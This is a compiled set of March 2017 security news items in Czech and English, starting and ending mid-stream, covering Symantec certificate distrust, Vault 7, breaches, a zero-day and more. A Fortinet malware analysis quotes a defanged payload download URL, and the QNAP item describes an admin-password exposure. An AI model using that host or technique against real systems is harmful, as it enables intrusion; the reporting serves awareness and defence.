Navrhovaný trest sice neuvažuje nad úplným odebráním důvěry, zejména vhledem k vysokému tržnímu podílu firmy, ale i tak je poměrně přísný. Navrhované kroky se týkají všech certifikačních autorit vlastněných společností Symantec, včetně velmi rozšířené autority GeoTrust.

Nově vydané certifikáty by nesměly mít delší platnost než 9 měsíců, jinak by jim Chrome nedůvěřoval. Co se týče stávajících certifikátů, tak těm bude odebrána důvěra graduálně v průběhu cca jednoho roku, podle doby jejich platnosti. Jejich majitelé by tam měli mít dostatek času pořídit si certifikát nový.

Postupné odebrání důvěry by se týkalo také EV certifikátů, které by navíc prakticky okamžitě byly poníženy na úroveň běžných certifikátů. V adresních řádcích už by se tak neobjevovaly názvy firem, kterým byly vystaveny. Což také může být problém, protože některé firmy a služby vycvičily své uživatele, aby právě na to koukali. Nově vydané EV certifikáty by Chrome neakceptoval vůbec.

Název firmy z adresního řádku půjde pryč
Název firmy z adresního řádku půjde pryč
Přidají se další prohlížeče?
Navzdory tomu, že o problémech věděl, Symantec opakovaně selhal v jejich oznámení. Navíc ani poté, co se informace dostaly na veřejnost, Symantec odmítl vydat informace, které komunita vyžadovala, aby mohla prověřit závažnost problémů, dokud nebyl výslovně tázán, popisuje návrh přitěžující okolnosti.

Nutno dodat, že návrh zatím není hotová věc. Vývojový tým prohlížeče Chrome ho zveřejnil proto, že chce na svou stranu získat další prohlížeče a odebrání důvěry s nimi koordinovat, aby mezi uživateli nebyl zmatek. Lze však předpokládat, že tvůrci dalších prohlížečů budou návrh kvitovat. Např. Mozilla s Firefoxem už dříve ukázala, že se špatnými certifikačními autoritami nemá slitování a jako první odebrala důvěru WoSign.

Důležité je, že se nic nezmění ze dne na den a uživatelé dostanou čas certifikáty vyměnit. Pro Symantec to samozřejmě bude znamenat velkou ránu a velký odliv klientů, ale úplný konec nikoliv. Pokud firma podnikne kroky k nápravě a bude fungovat transparentněji, může se opět stát plnohodnotnou certifikační autoritou. Ale hned to nebude.


Hackeři vydírají Apple: Zaplaťte, jinak vymažeme miliony zařízení!
24.3.2017 Živě.cz Apple
Společnosti Apple hackeři hrozí, že pokud nezaplatí výkupné, odstraní data z milionů zařízení jejich zákazníků. Hackerská skupina Turkish Crime Family tvrdí, že disponuje databází s přibližně 627 miliony přihlašovacích údajů do cloudové služby iCloud. Účty prý uživatelům vymažou 7. dubna, upozornil Neowin.
PCWorld hackery kontaktoval a ti upřesnili, že všechny přihlašovací údaje otestovali prostřednictvím automatizovaných skriptů. Výsledkem je více než 220 milionů účtů, které nejsou dostatečně chráněny - chybí jim dvoufaktorová autentizace.

Útočníci zpočátku požadovali zaplacení výkupného 75 tisíc amerických dolarů (1,9 milionu korun) ve virtuální měně bitcoin nebo ethereum. Uspokojili by se však i s dárkovými poukázkami pro iTunes v celkové hodnotě 100 tisíc dolarů. Později výška výkupného vzrostla na 150 tisíc dolarů (3,8 milionu korun), přičemž po třech dnech částka opět poroste.
Další úspěšný útok pomocí ransomware: univerzita v Calgary zaplatila výkupné 20 tisíc dolarů
V případě, že do 7. dubna 2017 hackeři nedostanou požadovanou částku, hrozí vymazáním milionů uživatelských účtů. Odstraní údajně i soubory přímo v zařízeních zákazníků Applu.

Apple kyberzločince neodměňuje

Web Motherboard získal část údajné e-mailové komunikace mezi členem hackerské skupiny a společností Apple. Podle ní si člen bezpečnostního týmu nejprve vyžádal vzorek uniklých dat.

Ve druhé zprávě žádá pracovník informuje, že společnost neodměňuje kybernetické zločince za porušení zákona. Nakonec dodává, že celá komunikace byla archivována a bude postoupena orgánům činným v trestním řízení.

Ať už je hrozba reálná nebo jde jen o způsob, kterým se snaží hackeři obohatit, nejefektivnější ochranou je změna hesla a aktivace dvoufázového přihlašování.


AppleInsider později zveřejnil stanovisko Applu. Společnost uvedla, že její systémy nebyly ohroženy žádným kyberútokem. Přihlašovací údaje, kterými disponují počítačoví zločinci, měly být získány z napadených služeb třetích stran.

Firma dodala, že v rámci bezpečnostních opatření monitoruje a v případě potřeby blokuje všechny pokusy o neoprávněný přístup do cizího účtu.


Third-Party App Store Slips Inside iOS App Store

24.3.2017 securityweek iOS
A third-party app store application managed to slip into the official iOS App Store by masquerading as a legitimate financial helper application, according to Trend Micro researchers.

Dubbed “Household Accounts App” and claiming to be a financial helper app for families, the application is designed with Japanese characters, but the app store it leads to is written in Mandarin Chinese. The researcher discovered the program in the App Store of multiple countries and couldn’t determine exactly who it targets.

When launched for the first time, the application checks the PPAASSWOpenKey key in the system’s user preference plist, which allows it to determine if it has run before, because the key doesn’t exist if it hasn’t, the researchers explain. Next, the app switches to the else branch, which requests the right to use data to access the third-party store, but the user has to approve the request.

The third-party store can be used to install not only applications in the official iOS App Store, but also those that are distributed via unofficial channels, thus potentially exposing users to mobile malware and other unwanted applications. One of the programs distributed via this portal is “PG Client,” a tool for jailbreaking iOS devices.

In addition to this third-party store, the security researchers found a program designed to promote applications already in the App Store. Dubbed “LoveApp”, the software could bypass Apple’s arrangement of apps in searches and the paid Search Ads option and could create revenue by charging developers looking to promote apps without using Apple’s promotion service.

LoveApp was found to abuse iOS APIs that allow developers to display their app’s page, but did that to direct users from its own listing to the App Store listing of the promoted apps. This app also has a series of privacy issues, because the app was found to upload some user attributes to its servers at installation, including advertising identifier (idfa), which is used to count the number of downloads.

The app also uses a third-party SDK called TalkingData to gather information about the user’s behavior. The SDK has many aggressive API calls and can acquire various information about the user’s system, such as the Wi-Fi network name, running processes, and IP address. On jailbroken devices, it can also gather the user’s Apple ID and installed apps.

“We recommend that users be careful about downloading apps from third-party app stores. Apple can’t endorse the safety of any of the apps delivered via third-party stores, and such is the case here: users are still exposing themselves to various security threats (including malware and other unwanted apps). Organizations should put in place policies to reduce the risk from these malicious apps, such as blocking unapproved app stores and safeguarding personal devices,” Trend Micro notes.


Apple: CIA's Mac, iPhone Vulnerabilities Already Patched

24.3.2017 securityweek Apple
Apple Tells WikiLeaks to Submit CIA Exploits Through Normal Process

Apple’s initial analysis of the iPhone and Mac exploits disclosed by WikiLeaks on Thursday shows that the vulnerabilities they use have already been patched. The company told WikiLeaks to send the information it possesses through the regular submission process.

WikiLeaks’ second “Vault 7” dump, dubbed by the organization “Dark Matter,” includes documents describing tools allegedly used by the U.S. Central Intelligence Agency (CIA) to spy on iPhones and Mac computers. However, installing the implants requires physical access to the targeted device.

The documents are dated 2008, 2009 and 2012, but WikiLeaks claims it has information that the CIA has continued to work on these tools. Apple has conducted a preliminary assessment of the latest WikiLeaks disclosure and determined that the vulnerabilities described in the documents were patched years ago.

“Based on our initial analysis, the alleged iPhone vulnerability affected iPhone 3G only and was fixed in 2009 when iPhone 3GS was released. Additionally, our preliminary assessment shows the alleged Mac vulnerabilities were previously fixed in all Macs launched after 2013,” Apple told SecurityWeek.

Follow
WikiLeaks ✔ @wikileaks
Apple's claim that it has "fixed" all "vulnerabilities" described in DARKMATTER is duplicitous. EFI is a systemic problem, not a zero-day.
2:33 AM - 24 Mar 2017
2,605 2,605 Retweets 3,557 3,557 likes

Apple’s analysis of the first Vault 7 leak also showed that many of the disclosed iOS exploits had already been patched in the latest version of the mobile operating system.

The tools described in the Dark Matter leak include Sonic Screwdriver, which is designed to allow code execution on a Mac laptop with password-protected firmware via an exploit stored on a Thunderbolt-to-Ethernet adapter.

The DarkSeaSkies implant is designed for targeting the EFI on MacBook Air computers, while NightSkies can be used to steal data from iPhones.

The documents show that the exploits can be delivered either via a supply chain intercept or by giving the manipulated device to the target as a gift. However, some believe the claims made by WikiLeaks regarding supply chain interception are misleading.

Apple has not negotiated with WikiLeaks

WikiLeaks has not made public any of the actual exploits, but it has promised to share them with affected tech companies. However, the whistleblower organization wants these companies to meet certain conditions, including to promise to patch the vulnerabilities within 90 days.

While Mozilla has accepted WikiLeaks’ offer, it appears Google, Apple and other companies are not eager to cooperate, which WikiLeaks has blamed on “conflicts of interest due to their classified work for U.S. government agencies.” Apple said it had not negotiated with WikiLeaks for any information.

“We have given them instructions to submit any information they wish through our normal process under our standard terms,” Apple said in its statement. “Thus far, we have not received any information from them that isn’t in the public domain. We are tireless defenders of our users' security and privacy, but we do not condone theft or coordinate with those that threaten to harm our users.”


Android Forums Suffers Data Breach

24.3.2017 securityweek Android
Android Forums, one of the most popular online Android communities, informed members this week that the server hosting its website has been breached, allowing attackers to access some user information.

According to representatives of Neverstill Media, which maintains Android Forums, hackers only managed to access information on 2.5 percent of active users. The compromised data includes email addresses, hashed passwords and salts.

Neverstill said usernames and financial data were not accessed. The company also noted that the breach only affected one staff member and only 40 users who registered accounts in 2016 and 2017. More than half of the compromised accounts had never posted anything on Android Forums, leading developers to believe they may have been bots.Android Forums hacked

Affected users have been notified via email and instructed to change their passwords. The passwords of impacted accounts that had not been active were automatically randomized.

The accessed information can be leveraged for spam and phishing campaigns, and users have been advised to be cautious.

“This could be someone who is upset with us who hopes to use the information against staff. They could blackmail us and threaten to publish the information publicly,” Android Forums told users.

The vulnerability exploited by the attackers has been patched and various security improvements are being made to prevent incidents in the future.

This is not the first time Android Forums has suffered a data breach. A similar incident took place in 2012, when more than one million users, including staff, had their details exposed. At the time, attackers accessed usernames, email addresses, hashed and salted passwords, IPs, and other data.

It’s unclear why usernames have not been stolen in the latest breach, but Android Forums has some theories.

“Perhaps just in case a null entry was to be found/flagged. Perhaps they were bound by the limitations of the vector they used. Perhaps they were practicing on us,” users were told. “Or, they could be comparing hashes against the previous set to see what has or has not changed.”


Google Stops Trusting Symantec-Issued Certificates

24.3.2017 securityweek Safety
Google is displeased with the fact that Symantec has failed to ensure that its partners don’t improperly issue digital certificates, which is why the tech giant has announced its intent to gradually stop trusting all of the company’s existing certificates in Chrome.

Symantec, and particularly some of its subsidiaries and WebTrust audited partners, have been caught by Google and others wrongly issuing certificates. In 2015, Google told Symantec to step up its game after a subsidiary certificate authority (CA) issued unauthorized google.com certificates.

More recently, Symantec’s GeoTrust and Thawte were found to have wrongly issued more than 100 certificates, including for domains such as test.com and example.com.

According to Google software engineer Ryan Sleevi, an investigation revealed that Symantec’s partners misissued at least 30,000 certificates in the past years. These certificates were issued by four organizations: CrossCert (Korea Electronic Certificate Authority), Certisign Certificatadora Digital, Certsuperior S. de R. L. de C.V., and Certisur S.A.

Symantec has authorized these companies to perform validation for certificate information, but failed to properly audit them, and according to the Baseline Requirements, the cybersecurity giant is liable for any issues. Another problem is that there is no way to distinguish certificates validated by Symantec from certificates validated by the company’s partners, Sleevi said.

“Despite having knowledge of these issues, Symantec has repeatedly failed to proactively disclose them. Further, even after issues have become public, Symantec failed to provide the information that the community required to assess the significance of these issues until they had been specifically questioned,” Sleevi explained. “The proposed remediation steps offered by Symantec have involved relying on known-problematic information or using practices insufficient to provide the level of assurance required under the Baseline Requirements and expected by the Chrome Root CA Policy.”

As a result of Symantec’s failings, Google wants to remove the recognition of Extended Validation status for certificates issued by the company, and reduce the accepted validity period for newly issued certificates to nine months or less. Under the current proposal, all existing certificates will gradually become untrusted.

Since Symantec-issued certificates account for a significant percentage of the total, Google wants the certificates to be replaced gradually in order to avoid disruptions for websites and their visitors.

Starting with Chrome 59, the maximum age of Symantec-issued certificates will be decreased to 33 months and by Chrome 64 it will be reduced to 9 months.

Symantec said it strongly objects to Google’s decision, and called the action unexpected and the announcement irresponsible. The company said it hopes Google did not intend to create uncertainty and doubt within the community about its SSL/TLS certificates. Symantec's statement reads:

Google’s statements about our issuance practices and the scope of our past mis-issuances are exaggerated and misleading. For example, Google’s claim that we have mis-issued 30,000 SSL/TLS certificates is not true. In the event Google is referring to, 127 certificates – not 30,000 – were identified as mis-issued, and they resulted in no consumer harm. We have taken extensive remediation measures to correct this situation, immediately terminated the involved partner’s appointment as a registration authority (RA), and in a move to strengthen the trust of Symantec-issued SSL/TLS certificates, announced the discontinuation of our RA program. This control enhancement is an important move that other public certificate authorities (CAs) have not yet followed.

While all major CAs have experienced SSL/TLS certificate mis-issuance events, Google has singled out the Symantec Certificate Authority in its proposal even though the mis-issuance event identified in Google’s blog post involved several CAs.

We operate our CA in accordance with industry standards. We maintain extensive controls over our SSL/TLS certificate issuance processes and we work to continually strengthen our CA practices. We have substantially invested in, and remain committed to, the security of the Internet. Symantec has publicly and strongly committed to Certificate Transparency (CT) logging for Symantec certificates and is one of the few CAs that hosts its own CT servers. Symantec has also been a champion of Certification Authority Authorization (CAA), and has asked the CA/Browser Forum for a rule change to require that all certificate authorities explicitly support CAA. Our most recent contribution to the CA ecosystem includes the creation of Encryption Everywhere, our freemium program, to create widespread adoption of encrypted websites.

We want to reassure our customers and all consumers that they can continue to trust Symantec SSL/TLS certificates. Symantec will vigorously defend the safe and productive use of the Internet, including minimizing any potential disruption caused by the proposal in Google’s blog post.

We are open to discussing the matter with Google in an effort to resolve the situation in the shared interests of our joint customers and partners.


Windows Zero-Day Exploited by AdGholas, Neutrino EK

24.3.2017 securityweek Exploit

One of the Windows zero-day vulnerabilities patched by Microsoft this month has been exploited by cybercriminals since last summer, Trend Micro said on Friday.

Microsoft fixed many vulnerabilities with the March 2017 Patch Tuesday updates, including three flaws that had been exploited in the wild before patches were made available.

One of the flaws, tracked as CVE-2017-0022, has been described as an XML Core Services information disclosure vulnerability that can be exploited through Internet Explorer by getting the targeted user to click on a specially crafted link.

“An information vulnerability exists when Microsoft XML Core Services (MSXML) improperly handles objects in memory. Successful exploitation of the vulnerability could allow the attacker to test for the presence of files on disk,” Microsoft said in its advisory.

The security hole was spotted by researchers at Trend Micro, which reported it to Microsoft in September, and Proofpoint.

According to Trend Micro, the zero-day flaw has been used in the AdGholas malvertising campaign since July 2016, and it was added to the Neutrino exploit kit in September 2016. Experts believe CVE-2017-0022 replaced CVE-2016-3298 and CVE-2016-3351, which had also been used by AdGholas and another actor in malvertising operations before patches were made available.

Experts revealed a few months ago that CVE-2016-3298 and CVE-2016-3351 had been leveraged by the cybercriminals to avoid researchers. CVE-2017-0022 was apparently used for similar purposes.

“Successful exploitation of this vulnerability could allow a cybercriminal access to information on the files found in the user’s system,” explained Trend Micro threat analysts Brooks Li and Henry Li. “In particular, the attacker would be able to detect if the system is using specific security solutions – especially ones that analyze malware.”

Trend Micro has made available a technical analysis of the vulnerability and Microsoft’s patch. The company has also provided a brief explanation of how CVE-2017-0022 is exploited in a malvertising campaign involving the Neutrino exploit kit:

Malvertising campaign exploiting CVE-2017-0022

Malvertising campaign exploiting CVE-2017-0022


Researcher Builds WMI-Based Hacking Tool in PowerShell

24.3.2017 securityweek Hacking
Researcher Builds WMI-Based RAT in PowerShell

Security researcher Christopher Truncer released a WMI-based agentless post-exploitation RAT that he developed in PowerShell.

Last year, Truncer released a PowerShell script capable of carrying out different actions via Windows Management Instrumentation (WMI), both on the local and on remote machines. Dubbed WMImplant, the newly released Remote Access Tool (RAT) builds on that script, says Truncer, who is security researcher and Red Teamer at Mandiant.

“WMImplant leverages WMI for the command and control channel, the means for executing actions (gathering data, issuing commands, etc.) on the targeted system, and data storage. It is designed to run both interactively and non-interactively. When using WMImplant interactively, it’s designed to have a menu of commands reminiscent of Meterpreter,” Truncer reveals.

Some of the commands supported by the new tool include reading file contents and downloading files from the remote machine, listing the files and folders for a specific directory, searching for a file on a user-specified drive, and upload a file to the remote machine. It can also be used to list processes and start or kill a specific process.

Additionally, the tool can be used for lateral movement, offering support for running command line commands and getting the output, adding, modifying or removing registry values, enabling or disabling WinRM on the targeted host, running a PowerShell script on a system and receiving output, manipulating scheduled jobs, and creating, modifying, or deleting services.

WMImplant also offers support for data gathering operations (including information on users, targeted system, local and network drives, IP addresses, and installed programs), for logging off users, and for shutting down or restarting targeted systems. It can also be used to determine whether a user is away from the machine and to identify users who have logged into the system.

The security researcher explains that WMImplant uses WMI itself for data storage, and does so by leveraging existing WMI properties. Specifically, it uses the DebugFilePath property, which the researcher discovered that could store more than 250 megabytes of data. WMImplant’s command and control communications methodology is also shaped by this, the researcher says.

The RAT was designed for both interactive and non-interactive use, but the researcher says that the easiest way to use WMImplant is interactively, although that is not always possible. Unlike RATs such as Meterpreter or Cobalt Strike’s Beacon, which can load and execute PowerShell scripts, but require non-interactive use only, WMImplant has a built-in command-line generating feature that changes that.


Google Chrome to Distrust Symantec SSLs for Mis-issuing 30,000 EV Certificates
24.3.2017 thehackernews Safety
google-symantec-ssl-certificate
Google announced its plans to punish Symantec by gradually distrusting its SSL certificates after the company was caught improperly issuing 30,000 Extended Validation (EV) certificates over the past few years.
The Extended Validation (EV) status of all certificates issued by Symantec-owned certificate authorities will no longer be recognized by the Chrome browser for at least a year until Symantec fixes its certificate issuance processes so that it can be trusted again.
Extended validation certificates are supposed to provide the highest level of trust and authentication, where before issuing a certificate, Certificate Authority must verify the requesting entity's legal existence and identity.
The move came into effect immediately after Ryan Sleevi, a software engineer on the Google Chrome team, made this announcement on Thursday in an online forum.
"This is also coupled with a series of failures following the previous set of misissued certificates from Symantec, causing us to no longer have confidence in the certificate issuance policies and practices of Symantec over the past several years," says Sleevi.
One of the important parts of the SSL ecosystem is Trust, but if CAs will not properly verifying the legal existence and identity before issuing EV certificates for domains, the credibility of those certificates would be compromised.
Google Chrome Team started its investigation on January 19 and found that the certificate issuance policies and practices of Symantec from past several years are dishonest that could threaten the integrity of the TLS system used to authenticate and secure data and connections over the Internet.
Under this move, the Google Chrome team has proposed following steps as punishment:
1. EV certificates issued by Symantec till today will be downgraded to less-secure domain-validated certs, which means Chrome browser will immediately stop displaying the name of the validated domain name holder in the address bar for a period of at least a year.
2. To limit the risk of any further misissuance, all newly-issued certificates must have validity periods of no greater than nine months (effective from Chrome 61 release) to be trusted in Google Chrome.
3. Google proposes an incremental distrust, by gradually reducing the "maximum age" of Symantec certificates over the course of several Chrome releases, requiring them to be reissued and revalidated.
Chrome 59 (Dev, Beta, Stable): 33 months validity (1023 days)
Chrome 60 (Dev, Beta, Stable): 27 months validity (837 days)
Chrome 61 (Dev, Beta, Stable): 21 months validity (651 days)
Chrome 62 (Dev, Beta, Stable): 15 months validity (465 days)
Chrome 63 (Dev, Beta): 9 months validity (279 days)
Chrome 63 (Stable): 15 months validity (465 days)
Chrome 64 (Dev, Beta, Stable): 9 months validity (279 days)
This means, starting with Chrome 64, which is expected to come out in early 2018, the Chrome browser will only trust Symantec certificates issued for nine months (279 days) or less.
Google believes this move will ensure that web developers are aware of the risk of future distrust of Symantec-issued certs, should additional misissuance events occur, while also giving them "the flexibility to continue using such certificates should it be necessary."


US Senate Just Voted to Let ISPs Sell Your Web Browsing Data Without Permission
24.3.2017 thehackernews BigBrothers
senate-internet-service-provider-sell-browser-history
The ISPs can now sell certain sensitive data like your browsing history without permission, thanks to the US Senate.
The US Senate on Wednesday voted, with 50 Republicans for it and 48 Democrats against, to roll back a set of broadband privacy regulations passed by the Federal Communication Commission (FCC) last year when it was under Democratic leadership.
In October, the Federal Communications Commission ruled that ISPs would need to get consumers' explicit consent before being allowed to sell their web browsing data to the advertisers or other big data companies.
Before the new rules could take effect on March 2, the President Trump's newly appointed FCC chairman Ajit Pai temporarily put a hold on these new privacy rules.
Ajit Pai argued that the rules, which are regulated by FTC, unfairly favored companies like Google, Twitter, and Facebook, who have the ability to collect more data than ISPs and thus dominate digital advertising.
"All actors in the online space should be subject to the same rules, and the federal government shouldn’t favor one set of companies over another," FCC said in a statement.
"Therefore, he has advocated returning to a technology-neutral privacy framework for the online world and harmonizing the FCC’s privacy rules for broadband providers with the FTC’s standards for others in the digital economy."
Pai wanted that the FCC and the FTC should treat all online entities the same way. So those new privacy policies should be scrapped.
If the latest decision gets approval from the House of Representatives and signed by President Trump, this will make it easier for ISPs like Verizon, Comcast, and AT&T, to earn more money by collecting and selling data on what you buy, where you browse, and what you search for your home, all without taking your consent.
Since the Senate used the Congressional Review Act (CRA) to overturn the privacy rules, if the repeal is passed, it would not only roll back the FCC's privacy rules but also prevent the regulatory body from making similar privacy regulations in the future if the.
Not surprisingly, the broadband industry applauded the FCC's move, calling it "a welcome recognition that consumers benefit most when privacy protections are consistently applied throughout the Internet ecosystem."
But, of course, privacy advocates are not at all happy with the voting, arguing that the Senate has put ISPs profits over users’ privacy.


US blames North Korea for the $81 million Bangladesh cyber heist
24.3.2017 securityaffairs BigBrothers

US federal prosecutors speculate the involvement of North Korea in the cyber heist of $81 million from Bangladesh’s account at the New York Federal Reserve Bank.
The news was reported by The Wall Street Journal, prosecutors suspect the involvement of Chinese middlemen who helped the Government of Pyongyang to organize the cyber theft.

In February 2016, unknown hackers transferred the funds from the Bangladesh’s account at the New York Federal Reserve Bank to accounts in the Philippines through the SWIFT system.

In reality, the hackers attemted to steal much more, they tried to complete dozens of transfers for an overall amount of $850 million.

The disaster was avoided by accident because the bank’s security systems and typos in some requests allowed the identification of the theft attempts, investigators discovered that hackers failed 35 transfer attempts.

“$81 million was transferred from the Federal Reserve Bank to Filipino accounts while attempts to claim $850 million were foiled by the Federal Reserve Bank’s security system,” Razee Hassan, deputy governor of Bangladesh Bank, told AFP.

“Attempts to transfer money to Sri Lanka by the hackers were foiled as their transfer requests contained typos,” he added.

The hackers exploited gaps in communication between banks at weekends, the operation started on a Friday because the Bangladesh Bank is closed, on the following days, Saturday and Sunday, the Fed Bank in New York was being closed.

North Korea suspected Federal reserve New York hack

The choice of the Philippines as the landing country for the bank transfers was not casual, banks were also closed on the Monday due to the Chinese New Year.

A top police investigator in Dhaka told Reuters in December that some Bangladesh Bank officials deliberately exposed its computer systems allowing hackers to penetrate the systems.

The Justice Department and the New York Fed declined to comment on the report.

The suspect of the involvement of the North Korea behind the cyber heist is not a novelty

“The U.S. Federal Bureau of Investigation believes that North Korea is responsible for the heist, an official briefed on the probe told Reuters. Richard Ledgett, deputy director of the U.S. National Security Agency, publicly suggested on Tuesday that North Korea may be linked to the incident, while private firms have long pointed the finger at the reclusive state.” reported the Reuters Agency.

Security experts at Symantec linked the attacks against banks worldwide to the Lazarus APT group which is believed to be a nation state actor.

In June 2016, evidence collected by a senior security researcher from Anomali Labs linked the malware to the North Korean hacker crew known as Lazarus Group.

The expert discovered that five additional strains of malware that suggested the involvement of the Lazarus Group in the cyber attacks that targeted the banks.

The researchers at Symantec discovered that the hacking tools used by the gang share many similarities with the malicious code in the arsenal of the Lazarus APT.

The activity of the Lazarus Group surged in 2014 and 2015, its members used mostly custom-tailored malware in their attacks and experts that investigated on the crew consider it highly sophisticated.

“Symantec has found evidence that a bank in the Philippines has also been attacked by the group that stole US$81 million from the Bangladesh central bank and attempted to steal over $1 million from the Tien Phong Bank in Vietnam.” reads the analysis published by Symantec last year.

The experts at Symantec have spotted at least three strains of malware, Backdoor.Fimlis, Backdoor.Fimlis.B, and Backdoor.Contopee, which have been used in targeted attacks against financial institutions.

“Symantec has identified three pieces of malware which were being used in limited targeted attacks against the financial industry in South-East Asia: Backdoor.Fimlis, Backdoor.Fimlis.B, and Backdoor.Contopee.” states Symantec”At first, it was unclear what the motivation behind these attacks were, however code sharing between Trojan.Banswift (used in the Bangladesh attack used to manipulate SWIFT transactions) and early variants of Backdoor.Contopee provided a connection.”

The expert Aaron Shelmire from Anomali Labs supported this thesis with his investigation.

“Five new additional pieces of malware code discovered that contain unique portions of code related to the SWIFT attacks. ” wrote Shelmire.

The Anomali Labs team conducted deeper research into a very large malware data repository using a set of Yara signature below to search for the shared subroutines.

North Korea Lazarus group investigation Anomali Labs

The experts discovered five additional pieces of malware containing portions of code shared by Lazarus Group’s strains of malware, including the one used in the several SWIFT attacks, according to Shelmire.

Last week, SWIFT announced it planned to cut off the remaining North Korean banks still connected to its system as concerns about the North Korean nuclear program and missile tests conducted by Pyongyang.

The U.S. Treasury is considering sanctions against the alleged Chinese middlemen who facilitated the cyber heist.

The New York Fed and SWIFT declined to comment.


Fortinet researchers spotted a malware that infects both Microsoft and Apple OSs
24.3.2017 securityaffairs Apple

Malware researchers at Fortinet have discovered a weaponized Word document that is able to start the infection process on both Microsoft and Apple OSs.
Security researchers at Fortinet have spotted a weaponized Word document that has been designed to spread malware on either Microsoft Windows or Mac OS X, it is able to determine which OS is used by the person that opens the document and start the attack.

The documents trick victims into enabling macros, then a malicious VBA code is executed.

Once the VBA code is executed, the AutoOpen() function is automatically invoked. It first reads the data from the “Comments” property of the Word file, a base64-encoded string, and depending on the OS, executes a certain script.

When executed on Mac OS X, the script downloads a malicious file containing another script, written in python, that’s executed and communicate with the control server.

“When the python script is executed, it downloads a file from “hxxps://sushi.vvlxpress.com:443/HA1QE”, and executes it. The downloaded python script is a slightly modified version of the Python meterpreter file, which is also part of the Metasploit framework.” reads the analysis published by Fortinet. “The source code of the project can be downloaded from the following URL: hxxps://github.com/rapid7/metasploit-payloads/blob/master/python/meterpreter/meterpreter.py.”

The above script is a version of a Python Meterpreter file that leverages in-memory DLL injection mechanism.

A similar technique was implemented by the criminal gang tracked as GCMAN and a group of criminals that powered a hacking campaign that leverage on fileless malware in February,

The script used to start the attack on Window systems is much more sophisticated. It implements a “matryoshka” mechanism of powershell scripts and according to the researchers it only works on 64-bit versions of Windows.

Each layer is base64-encoded, once the final level is executed, the script downloads a 64-bit DLL file, which executes and communicates with the control server.

malware mac os windows

The malware researchers at Fortinet are still analyzing the malicious code.


QNAP QTS Domain Privilege Escalation Vulnerability
24.3.2017 securityaffairs Vulnerebility

The vulnerability allows any local user, such as “httpdusr” used to run web application, to escalate to Domain Administrator if the NAS is a domain member.
Pasquale ‘sid’ Fiorillo from ISGroup (www.isgroup.biz), an Italian
Security Company, and Guido ‘go’ Oricchio of PCego (www.pcego.com), a System Integrator, have just released a critical security advisory for any version of QNAP NAS prior to 4.2.4 Build 20170313 (https://www.qnap.com/en/support/con_show.php?cid=113).

QNAP NAS

QNAP Systems, founded in 2004, provides network attached storage (NAS) and network video recorder (NVR) solutions for home and business use to
the global market. QNAP also delivers a cloud service, called myQNAPcloud, that allows
users to access and manage devices from anywhere. QTS is a QNAP device proprietary firmware based on Linux.

The issue involves all the QNAP NAS (all models and all versions) that are members of a Microsoft Active Directory and allows a local QTS admin user, or other low privileged user (such as “httpdusr” used to run web application) to access configuration file that includes a bad crypted Microsoft Domain Administrator password.

The affected component is the “uLinux.conf” configuration file, created with a world-readable permission used to store a Domain Administrator password.

This password is stored in the file obfuscated by a simple XOR cypher and base64 encoded.

“The vulnerability allows a local QTS admin user, or other low privileged user, to access configuration file that includes a bad crypted Microsoft Domain Administrator password if the NAS was joined to a Microsoft Active Directory domain.” reads the advisory. “The affected component is the “uLinux.conf” configuration file, created with a world-readable permission used to store a Domain Administrator password. Admin user can access the file using ssh that is enabled by default. Other users are not allowed to login, so they have to exploit a component, such as a web application, to run arbitrary command or arbitrary file read. Anyone is able to read uLinux.conf file, world readable by default, can escalate to Domain Administrator if a NAS is a domain member.”

Users are strongly advised to update their systems to the latest version released by the vendor
(https://www.qnap.com/en/support/con_show.php?cid=113).

The Official advisory is available at: http://www.ush.it/team/ush/hack-qnap/qnap.txt


Vault7 Dark Matter batch – CIA has been targeting the iPhone supply chain since at least 2008
24.3.2017 securityaffairs BigBrothers

Wikileaks released the second bash of CIA’s Vault 7 dump, it contains other precious documents to understand the way CIA was hacking systems worldwide.
The Wikileaks Vault 7 dump will make for a long time the headlines, the organization has just released another lot of classified documents related the hacking tools and techniques and exploit codes used by the CIA cyber spies to hack Apple MacBook and iOS devices.

Wikileaks dubbed this batch of information as ‘Dark Matter,’ it includes five documents on Mac and iPhone hacks developed by the CIA.

Dark Matter Vault7

This is the second bash of Vault 7 released by WikiLeaks after the whistleblower organization released the first one on March 7.

The hacking tools and techniques were devised by CIA unit, called Embedded Development Branch (EDB).

“Today, March 23rd 2017, WikiLeaks releases Vault 7 ‘Dark Matter’, which contains documentation for several CIA projects that infect Apple Mac Computer firmware (meaning the infection persists even if the operating system is re-installed) developed by the CIA’s Embedded Development Branch (EDB). These documents explain the techniques used by CIA to gain ‘persistence’ on Apple Mac devices, including Macs and iPhones and demonstrate their use of EFI/UEFI and firmware malware.” reads the Dark Matter description provided by Wikileaks.

The CIA experts have found a way to infect Apple firmware to gain persistence, in this way the attackers were able to maintain the infection on Mac OS and iOS devices even if the operating system has been re-installed.

According to WikiLeaks, one of the most interesting documents is related to the “Sonic Screwdriver” project, which is a “mechanism for executing code on peripheral devices while a Mac laptop or desktop is booting”allowing an attacker to boot its attack software for example from a USB stick “even when a firmware password is enabled”.

The technique allows a local attacker to boot its hacking tool using a peripheral device (i.e. USB stick, screwdriver),“even when a firmware password is enabled” on the device. This implied that the Sonic Screwdriver allows attackers to modify the read-only memory of a device, the documents revealed that malware is stored in the Apple Thunderbolt-to-Ethernet adapter.

Digging in the Dark Matter dump we can find the NightSkies 1.2 hacking tool, which is described as a “beacon/loader/implant tool” for the Apple iPhone.

“Also included in this release is the manual for the CIA’s “NightSkies 1.2” a “beacon/loader/implant tool” for the Apple iPhone. Noteworthy is that NightSkies had reached 1.2 by 2008, and is expressly designed to be physically installed onto factory fresh iPhones. i.e the CIA has been infecting the iPhone supply chain of its targets since at least 2008.” continues Wikileaks.

This hacking tool has expressly been designed by the CIA hackers to infect “factory fresh” iPhones, likely during transport. The existence of the tool suggests that the Central Intelligence Agency has been targeting the iPhone supply chain since at least 2008.

“While CIA assets are sometimes used to physically infect systems in the custody of a target it is likely that many CIA physical access attacks have infected the targeted organization’s supply chain including by interdicting mail orders and other shipments (opening, infecting, and resending) leaving the United States or otherwise,” says WikiLeaks.

“DarkSeaSkies” is another implant described in the Dark Matter repository. It is described as “an implant that persists in the EFI firmware of an Apple MacBook Air computer” and consists of “DarkMatter”, “SeaPea” and “NightSkies”, respectively EFI, kernel-space and user-space implants.

Wikileaks plans to release more interesting information about the CIA cyber capabilities and hacking techniques.


Data breach – Are you an Android Forums user? Resets your passwords now.
24.3.2017 securityaffairs Android

